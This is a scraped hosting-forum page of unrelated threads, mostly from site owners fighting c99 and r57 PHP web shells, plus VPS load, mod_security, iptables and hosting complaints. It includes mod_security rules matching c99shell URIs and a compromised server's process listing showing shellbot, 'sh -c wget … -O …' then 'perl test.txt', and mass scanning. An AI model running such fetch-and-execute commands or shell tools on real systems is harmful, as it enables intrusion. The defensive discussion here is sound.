guys im tired off fighting those hackers everyday! i have about 20 websites,and everyday i have one of them hacked! i restore a backup then another one hacked!
thats unbelivable!!!
those bastards upload there shell scripts to websites via bugs or whatever from php files!!
is there anyway to stop these commands?
can .htaccess helps? how?
i talked to my webhosting companies for my websites! ....
Recently my site was defaced, (i own a dedicated server), my server was not touched, but one of the applications I used on the site was exploited to gain access to it.
I have noticed 4 or 5 c99 shells in different locations on my ftp. The site is back online, but it's definitely possible that they have one of these hidden somewhere and that they'll just do it again. I am using cent os 5
How can I easily search for these on my box? Can I disable their functionality? is there setting I can use in htaccess or something to make my website safer? I visited one of the scripts, and it said SAFEMODE OFF, how can I at least enable safemode?
I don't know much of anything about linux, but I am running cpanel and WHM. I have a guy who manages my box but he is hard to get a hold of sometimes, and I'd like to take care of this ASAP!
I found these folders in the root
/usr/bin/c99
/usr/include/boost/numeric/interval/detail/c99_rounding_control.hpp
/usr/include/boost/numeric/interval/detail/c99sub_rounding_control.hpp
what are these ? is it normal folders ? or somebody hacked our server?
what shall I do?
I just installed zen cart on my webhosting and after few days later i saw some file written like core1405.php and when i open to view the file it is actually trojan c99shell.
I have deleted all of the core file. Now how can i prevent it from happen again? Cause it is too much work to clean up the hosting server.
How to stops the scripts like c99 shell from installing into the server?
View 1 Replies View RelatedI installed modsecurity from Addone module in Cpanel
When I try to apply phpshell woork good without a mistakes and I can do anything despite of the presence of protection modsecurity and disable_functions in php.ini.
Is there a particular settings add to the httpd.conf to prevent application phpshell or prevent upload it to the site?
the biggest security issue i have with my clients is php c99 shell and similar php files, somehow these files uploaded on the website and from here they start attacking the websites.
i have seen also that once you upload the c99 php file you are able to see the accounts information ( such as a user name ) on the same server
so is there any way to disable this kind of php file or at least disable some function within the file!
i have been thinking to install and run a antivirus on the server , but i see sometimes they upload the encrypted version of the file , so the antirus can't catch the file as a torjan!
how i can detect and disable C99 shell and another shell script exp:r57 ....
View 9 Replies View Relatedi want to prevent c99shell scripts from running.
I found this rule to detect URI's for the c99 shell.
#new kit
SecFilterSelective REQUEST_URI "/c99shell.txt"
SecFilterSelective REQUEST_URI "/c99.txt?"
My problem is that the hackers are being more stealthy and calling the
script some random name like .../myphpstuff.php. So the URI no longer helps detect it.
How could I detect "c99shell" in the actual file that apache servers? This assumes that the hacker was successfully in installing it.
my box
Apache 1.3.37
WHM 11.2.0 cPanel 11.11.0-R16983
FEDORA 5 i686 - WHM X v3.1.0
Is there a way to stop them totally? i.e. even though they are successfully uploaded but I do not want the source to be available to them etc.?
I mean, is there a way to hide or not allow them to execute any shell?
I have few scripts, but hackers again upload at some way c99, and hack some SMF forums at server. Server like server they cannot hack, but user account they can. So please tell me what you advice?
View 6 Replies View RelatedI have a VPS with 768Mb of RAM which was always suitable for the websites I'm hosting
as most of them are not popular and none of them got high traffic recently at all
But for over 2 days the vps is eating the ram and killing all the services (cpanel/httpd/ftp/MySQL..)
I want to know what is causing this and stop it by any way
I contacted my vps support and they told me to write "top" in the SSH but I didn't understand any thing from what I see and I didn't know what to do after writing that command .
I remember long time ago when I used to host on Layered Tech fast network good stuff, affordable price my first server costed me 90 dollars on Layered Tech with about 20 dollar setup one time fee.
I visited today after about 2 years and I'm pretty much surprised to see their prices they are by no means affordable as they were previously and the setup fee is now 50 dollars on every server.
With such large number of servers in their data centers shouldn't they be able to make them affordable? yet I have seen same server on WHT ads section for fraction of the price LT expects and not to mention the excessive setup fee.
I'm not complaining, its their business, but is it really helping them? I cant be the only person feeling this anti-love for Layered Tech being a former LT customer, I had no problems with them or their services I just left after I sold my site and moved into VPS. But seeing the new prices its a bit shocking.
the server load averges on my VPS have been very high - escalating to 6.5 in cases.
The process causing this is:
PidOwnerPriorityCpu %Mem %Command 7370 mysql -10
76.7
3.0 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/opal.ngwebservers.net.pid --skip-external-locking
My VPS is hosted by Virpus Networks, and has spec:
512RAM (1024 burstable), 10GB hard drive space.
8 of these processors on node:
Processor #1 Vendor: GenuineIntel
Processor #1 Name: Intel(R) Xeon(TM) CPU 2.80GHz
Processor #1 speed: 174.594 MHz
Processor #1 cache size: 2048 KB
No hardware or software changes were implemented on the VPS as far as I am aware.
The MySQL process causing this is:
28993movies_mybblocalhostmovies_mybbQuery36Copying to tmp tableSELECT t.tid, t.dateline, p.edittime, t.subject, f.allowhtml, f.allowmycode, f.allowsmilies, f.allow
This has been going on since I first saw the loads go high...
I have many servers on vrtservers.net and is happy of they support. And I planing be a reseller of them.
But the nightmare come from last day..
My main server have got some SPAM report from spamcap.net
[url]
the spamcap.net report my server runing a open proxy.and somebody using it as SPAM.
before the SPAM report..
I know this ISSUE and have fix it..
so the proxy just run many hours.[ check the mrtg graph.[url]
sinse the SPAM report.
vrtserver.net put this server offline..
I can Understand it.
And I have contact the support@vrtservers.net Instantly.
And I proceed the case of spamcap.net too.
But the nightmare is ....
When I ask "how to reconnect my servers/What time will the case close?" to VRTSERVERs.NET.
the vrtservers.net reply to me said the server has been terminated and there is no way to get my data back.
My god ..
all of my server's data has been lost!
vrtservers.net is killing me now!
I have a VPS with 320MB of RAM. The problem is that spammassassin is killing my VPS.
Spamd service was using 50% of memory (+- 150MB of RAM).
Do you think that this is normal RAM for Spamd?
trying to get mod_security installed on my HSphere server, the install goes ok until i try and load rules?
If i just load the exclude.conf rule then php sites work, if i also load rules.conf or any other rules then my php sites get 'connection refused error' ?
I cannot find any thing in logs and there is no log written for mod_security?
here is my modsecurity.conf
Quote:
#If you want to scan the output, uncomment these
#SecFilterScanOutput On
#SecFilterOutputMimeTypes "(null) text/html text/plain"
# Accept almost all byte values
SecFilterForceByteRange 1 255
# Server masking is optional
#fake server banner - NOYB used - no one needs to know what we are using
SecServerSignature "NOYB"
#SecUploadDir /tmp
#SecUploadKeepFiles Off
# Only record the interesting stuff
SecAuditEngine RelevantOnly
SecAuditLog /var/log/audit_log
# You normally won't need debug logging
SecFilterDebugLevel 0
SecFilterDebugLog logs/modsec_debug_log
#And now, the rules
#Remove any of these Include lines you do not use or have rules for.
#First, add in your exclusion rules:
#These MUST come first!
Include /etc/modsecurity/exclude.conf
#Application protection rules
#Include /etc/modsecurity/rules.conf
bash-2.05b# cat /etc/modsecurity.conf
<IfModule mod_security.c>
# Only inspect dynamic requests
# (YOU MUST TEST TO MAKE SURE IT WORKS AS EXPECTED)
#SecFilterEngine DynamicOnly
SecFilterEngine On
# Reject requests with status 500
SecFilterDefaultAction "deny,log,status:500"
# Some sane defaults
SecFilterScanPOST On
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat On
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies On
# enable version 1 (RFC 2965) cookies
SecFilterCookieFormat 1
SecServerResponseToken Off
#If you want to scan the output, uncomment these
#SecFilterScanOutput On
#SecFilterOutputMimeTypes "(null) text/html text/plain"
# Accept almost all byte values
SecFilterForceByteRange 1 255
# Server masking is optional
#fake server banner - NOYB used - no one needs to know what we are using
SecServerSignature "NOYB"
#SecUploadDir /tmp
#SecUploadKeepFiles Off
# Only record the interesting stuff
SecAuditEngine RelevantOnly
SecAuditLog /var/log/audit_log
# You normally won't need debug logging
SecFilterDebugLevel 0
SecFilterDebugLog logs/modsec_debug_log
#And now, the rules
#Remove any of these Include lines you do not use or have rules for.
#First, add in your exclusion rules:
#These MUST come first!
Include /etc/modsecurity/exclude.conf
#Application protection rules
#Include /etc/modsecurity/rules.conf
#Comment spam rules
#Include /etc/modsecurity/blacklist.conf
#Bad hosts, bad proxies and other bad players
##Include /etc/modsecurity/blacklist2.conf
#Bad clients, known bogus useragents and other signs of malware
##Include /etc/modsecurity/useragents.conf
#Known bad software, rootkits and other malware
##Include /etc/modsecurity/rootkits.conf
#Signatures to prevent proxying through your server
#only rule these rules if your server is NOT a proxy
##Include /etc/modsecurity/proxy.conf
#Just in Time Patching for Vulnerable Applications
##Include /etc/modsecurity/jitp.conf
#Google Hacks signatures
##Include /etc/modsecurity/recons.conf
#Include /etc/modsecurity/
</IfModule>
I have a VPS with 256m guaranteed RAM .. and I have CPanel. A couple of days ago I got to fiddling with a database issue and had phpMyAdmin open for the better part of an hour. So I got to wondering what something like that does to my VPS?
A secondary question .. same thing but on a dedicated server with 1g RAM?
Virtuozzo 3.0 is killing VPS's /usr/bin/mysqld_safe process but leaving /usr/sbin/mysqld UP which is causing cPanel to be unable to automatically restart MySQL after that.
View 14 Replies View Relatedfrom top:
12478 root 35 19 2004 680 308 R 39 0.0 8:54.95 gzip
using anywhere from 30-50% of my cpu for nearly 10 min now. but, no memory usage.
any ideas? should i kill the pid?
site is running pretty slow as a result of this.
24 hours ago something wired happend..
For some reason httpd is causing high serverload.
ATM : 22:44:17 up 22:17, 2 users, load average: 6.23, 6.12, 8.88
U
Will keep gooing up and httpd need to be restartet when serverload comes up to 30.
The traffic on the server is normal, no changes is made on the server.
Opt 248
3gb ram
250gb sata II
I have a fairly unique problem. My server runs great 95% of the time. Loads average under 1. However backups have become a server killer. I use cpanel scheduled backup at early morning hours. The reason backups kill my server is that I have 300,000+ (and counting) images in a directory. They are all small pngs generated by LaTeX. It takes my server several hours to backup the images. I usually even have to stop apache to free up some power. This problem is only going to get worse as I get more images. Maybe I could upgrade proc or upgrade to faster HD? That would be costly, hopefully not.
Should I hire a professional backup service? Costly, and would that help? Or is there a way of storing the images or doing the cpbackup I am doing wrong?
if it was possible to kill a server running WHMCS by executing the cron.php via cronjob on a remote server once every minute.
I just wanted to see if this was potentially harmful, so I can submit it to Matt without sounding like an idiot...
One of these rules is causing name server lookups to fail, but I can't seem to figure out which one, can anyone spot the problem?
Code:
[root@example ~]# iptables -L -n
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0
INVDROP all -- 0.0.0.0/0 0.0.0.0/0 state INVALID
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x00
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x3F
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x03/0x03
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x06
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x05/0x05
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x11/0x01
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x18/0x08
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x30/0x20
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:20
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:21
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:22
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:25
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:80
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:110
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:143
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:443
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:465
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:953
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:993
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:995
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:10023
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:20
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:21
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:953
ACCEPT icmp -- 0.0.0.0/0 0.0.0.0/0 state NEW icmp type 8
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpts:1024:65535
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpts:1024:65535
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spts:1024:65535 dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spts:1024:65535 dpt:53
LOGDROPIN all -- 0.0.0.0/0 0.0.0.0/0
Chain FORWARD (policy DROP)
target prot opt source destination
Chain OUTPUT (policy DROP)
target prot opt source destination
INVDROP all -- 0.0.0.0/0 0.0.0.0/0 state INVALID
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x00
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x3F/0x3F
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x03/0x03
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x06
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x05/0x05
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x11/0x01
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x18/0x08
INVDROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x30/0x20
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:20
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:21
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:22
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:25
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:80
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:110
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:113
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:443
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:953
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:10023
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:9999
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:20
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:21
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:113
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:123
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 state NEW udp dpt:953
ACCEPT icmp -- 0.0.0.0/0 0.0.0.0/0 state NEW icmp type 8
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spts:1024:65535 dpt:53
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spts:1024:65535 dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp spt:53 dpts:1024:65535
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:53 dpts:1024:65535
LOGDROPOUT all -- 0.0.0.0/0 0.0.0.0/0
Chain INVDROP (18 references)
target prot opt source destination
DROP all -- 0.0.0.0/0 0.0.0.0/0
Chain LOGDROPIN (1 references)
target prot opt source destination
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:67
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:67
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:68
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:68
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:111
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:111
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:113
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:113
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpts:135:139
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpts:135:139
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:445
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:445
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:513
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:513
DROP tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:520
DROP udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:520
LOG tcp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_IN Blocked* '
LOG udp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_IN Blocked* '
LOG icmp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_IN Blocked* '
DROP all -- 0.0.0.0/0 0.0.0.0/0
Chain LOGDROPOUT (1 references)
target prot opt source destination
LOG tcp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *TCP_OUT Blocked* '
LOG udp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *UDP_OUT Blocked* '
LOG icmp -- 0.0.0.0/0 0.0.0.0/0 limit: avg 30/min burst 5 LOG flags 0 level 4 prefix `Firewall: *ICMP_OUT Blocked* '
DROP all -- 0.0.0.0/0 0.0.0.0/0
My nobody_check is killing a process that seems to be o.k. but I'm not sure. The process is running /usr/bin/perl-bin which I never heard of. I thought it was /usr/bin/perl
Should I be concerned? Again, I don't know what /perl-bin is.
Process ID: 28457 has been killed
Restuls for PID: 28457
total 0
dr-xr-xr-x 3 nobody nobody 0 Jul 23 17:00 .
dr-xr-xr-x 201 root root 0 Jun 29 11:59 ..
dr-xr-xr-x 2 root root 0 Jul 23 17:00 attr
-r-------- 1 root root 0 Jul 23 17:00 auxv
-r--r--r-- 1 root root 0 Jul 23 17:00 cmdline
lrwxrwxrwx 1 root root 0 Jul 23 17:00 cwd -> /
-r-------- 1 root root 0 Jul 23 17:00 environ
lrwxrwxrwx 1 root root 0 Jul 23 17:00 exe -> /usr/bin/perl-bin
dr-x------ 2 root root 0 Jul 23 17:00 fd
-rw-r--r-- 1 root root 0 Jul 23 17:00 loginuid
-r-------- 1 root root 0 Jul 23 17:00 maps
-rw------- 1 root root 0 Jul 23 17:00 mem
-r--r--r-- 1 root root 0 Jul 23 17:00 mounts
lrwxrwxrwx 1 root root 0 Jul 23 17:00 root -> /
-r--r--r-- 1 root root 0 Jul 23 17:00 stat
-r--r--r-- 1 root root 0 Jul 23 17:00 statm
-r--r--r-- 1 root root 0 Jul 23 17:00 status
dr-xr-xr-x 3 root root 0 Jul 23 17:00 task
-r--r--r-- 1 root root 0 Jul 23 17:00 wchan
Netstat:
tcp 0 0 127.0.0.1:783 127.0.0.1:40957
CLOSE_WAIT 28457/spamd child
udp 0 0 xx.xxx.xxx.xx:41008 216.52.190.1:53
ESTABLISHED 28457/spamd child
unix 3 [ ] STREAM CONNECTED 120878416 28457/spamd
child
unix 2 [ ] DGRAM 120872220 28457/spamd
child
unix 2 [ ] STREAM CONNECTED 120847759 28457/spamd
child
unix 2 [ ] STREAM CONNECTED 120832442 28457/spamd
child
Environ:
Process ID: 23944 has been killed
Restuls for PID: 23944
total 0
dr-xr-xr-x 3 nobody nobody 0 Jul 23 16:55 .
dr-xr-xr-x 206 root root 0 Jun 29 11:59 ..
dr-xr-xr-x 2 root root 0 Jul 23 17:00 attr
-r-------- 1 root root 0 Jul 23 17:00 auxv
-r--r--r-- 1 root root 0 Jul 23 16:55 cmdline
lrwxrwxrwx 1 root root 0 Jul 23 17:00 cwd -> /
-r-------- 1 root root 0 Jul 23 17:00 environ
lrwxrwxrwx 1 root root 0 Jul 23 16:55 exe -> /usr/bin/perl-bin
dr-x------ 2 root root 0 Jul 23 17:00 fd
-rw-r--r-- 1 root root 0 Jul 23 17:00 loginuid
-r-------- 1 root root 0 Jul 23 17:00 maps
-rw------- 1 root root 0 Jul 23 17:00 mem
-r--r--r-- 1 root root 0 Jul 23 17:00 mounts
lrwxrwxrwx 1 root root 0 Jul 23 17:00 root -> /
-r--r--r-- 1 root root 0 Jul 23 16:55 stat
-r--r--r-- 1 root root 0 Jul 23 16:55 statm
-r--r--r-- 1 root root 0 Jul 23 16:55 status
dr-xr-xr-x 3 root root 0 Jul 23 17:00 task
-r--r--r-- 1 root root 0 Jul 23 17:00 wchan
Netstat:
tcp 1 0 127.0.0.1:783 127.0.0.1:40955
CLOSE_WAIT 23944/spamd child
udp 0 0 xx.xx.xxx.xxx:55606 216.52.190.1:53
ESTABLISHED 23944/spamd child
unix 3 [ ] STREAM CONNECTED 120847760 23944/spamd
child
unix 2 [ ] STREAM CONNECTED 120832442 23944/spamd
child
unix 2 [ ] DGRAM 120677444 23944/spamd
child
Environ:
Hackers these days don't hack for money, alot of times they hack for pride and the lame fun in it.
Look at this website,
[url]
I am constantly battling hackers over the last week and I have to admit I'm not really sure what it is that is letting them in, but they're getting in... the processes all run as "apache" so clearly it's the webserver somehow.
I've changed the ssh port, have disabled cron on the apache user and have set php safe_mode on the site I think might be to blame, but still no luck.
Logged in this morning to be greeted by this...
Quote:
[root@s15247463 httpdocs]# ps -fe | grep apache
apache 2889 2220 1 Dec26 ? 00:18:36 /usr/sbin/httpd
apache 2891 2220 0 Dec26 ? 00:00:00 /usr/sbin/httpd
apache 2892 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 2893 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 2894 2220 0 Dec26 ? 00:00:00 /usr/sbin/httpd
apache 2895 2220 0 Dec26 ? 00:00:05 /usr/sbin/httpd
apache 2896 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 14664 2220 0 Dec26 ? 00:00:03 /usr/sbin/httpd
apache 32714 1 0 Dec26 ? 00:00:02 /apache/bin/httpd
apache 32719 1 0 Dec26 ? 00:00:02 /apache/bin/httpd
apache 19751 2894 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 19764 1 23 Dec26 ? 03:31:35 shellbot
apache 28642 2220 0 Dec26 ? 00:00:04 /usr/sbin/httpd
apache 28662 2891 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 28666 1 22 Dec26 ? 03:23:10 shellbot
apache 29532 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 29933 2220 0 Dec26 ? 00:07:18 /usr/sbin/httpd
apache 20833 2893 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20838 1 13 Dec26 ? 01:21:35 [httpds]
apache 20847 29532 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20853 1 13 Dec26 ? 01:21:33 [httpds]
apache 20870 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 20879 2892 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20884 1 13 Dec26 ? 01:21:28 [httpds]
apache 20887 2896 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20892 1 13 Dec26 ? 01:21:16 [httpds]
apache 20895 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 20896 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 20901 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 21445 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 1875 1 0 00:01 ? 00:00:00 [httpds]
apache 2237 1 0 00:14 ? 00:00:00 ./mocks start
apache 5465 20895 0 00:23 ? 00:00:00 [sh] <defunct>
apache 5477 1 6 00:23 ? 00:24:48 shellbot
apache 10110 14664 0 01:00 ? 00:00:00 [sh] <defunct>
apache 10142 1 11 01:00 ? 00:44:09 shellbot
apache 10537 2220 0 01:27 ? 00:00:01 /usr/sbin/httpd
apache 13780 1 0 02:28 ? 00:00:00 [httpds]
apache 13781 13780 0 02:28 ? 00:00:00 sh -c wget [url]
-O [url]
apache 13784 1 0 02:28 ? 00:00:00 [httpds]
apache 13785 13784 0 02:28 ? 00:00:00 sh -c wget[url]
-O [url]
apache 13788 1 0 02:28 ? 00:00:00 [httpds]
apache 13789 13788 0 02:28 ? 00:00:00 sh -c wget [url]
-O [url]
apache 13792 1 0 02:28 ? 00:00:00 [httpds]
apache 13793 13792 0 02:28 ? 00:00:00 sh -c wget [url]
-O [url]
apache 13798 13789 0 02:29 ? 00:00:00 perl test.txt
apache 13802 13781 0 02:29 ? 00:00:00 perl test.txt
apache 13806 13793 0 02:29 ? 00:00:00 perl test.txt
apache 13810 13785 0 02:29 ? 00:00:00 perl test.txt
apache 22282 2220 0 03:40 ? 00:00:00 /usr/sbin/httpd
apache 22434 20896 0 03:51 ? 00:00:00 [sh] <defunct>
apache 22442 1 10 03:51 ? 00:20:33 [httpd]
apache 22513 21445 0 03:55 ? 00:00:00 [perl] <defunct>
apache 22515 1 0 03:55 ? 00:00:00 /usr/local/apache/bin/nscan -DSSL
apache 22552 2220 0 03:58 ? 00:00:00 /usr/sbin/httpd
apache 23183 1 0 04:03 ? 00:00:48 /usr/local/apache/bin/nscan -DSSL
apache 23187 1 0 04:03 ? 00:00:47 /usr/local/apache/bin/nscan -DSSL
apache 3606 2220 0 04:52 ? 00:00:00 /usr/sbin/httpd
apache 27716 1 0 06:54 ? 00:00:00 [httpd]
apache 27720 1 0 06:54 ? 00:00:00 ./php
apache 28140 1 0 07:06 ? 00:00:00 /bin/sh ./mass 139
apache 28299 28140 0 07:12 ? 00:00:00 /bin/bash ./a 139.1
apache 28302 28299 9 07:12 ? 00:00:20 /bin/bash 139.1 22
We are rookies and we are being attacked by hackers for the second time in as many weeks. I can see them in shell right now on multiple servers. I can not remember in all the excitement how to take away their root access. How do I stop them from doing any more damage?
View 6 Replies View Relatedthis is the site whose banners appeared on my kids site after hacking,
View 0 Replies View RelatedSo we've got a client setup with 2 domains; 1 main and 1 secondary.
The secondary domain is a 301 redirect with masking through GoDaddy. The reason for the masking is because we need the domain name to stay the same after the redirect. (So people who come in on DomainB will only see DomainB in the url bar.)
The problem: GoDaddy has uses a "zero frame" element to implement the masking and it's messing up the display of our site.
Note: The display only screws up in IE.
Primary domain: www.BristolCountyWomensJournal.com --> (This works fine.)
301 domain: www.WomensJournals.com --> (Check out the messy background!)
Anyone know of alternatives to Domain Masking?
We're running on Linux/Apache/MySQL/RoR and have a number of cron jobs that run throughout the day on our server. We've been noticing lately that at certain times of the day the site becomes really slow. When I'm online with my engineers I can mention this to them and they can check and see and say "Oh yeah, it's job XYZ that's spiking the server load."
That's great but much of the time when I notice the sluggishness my developers are offline (we're in different time zones). I'm wondering if there's a fairly easy way to track this when they're not online so we can say "Yup, last night at 10 PM your time when you noticed that it was job ABC." There has to be something that allows you to do this right?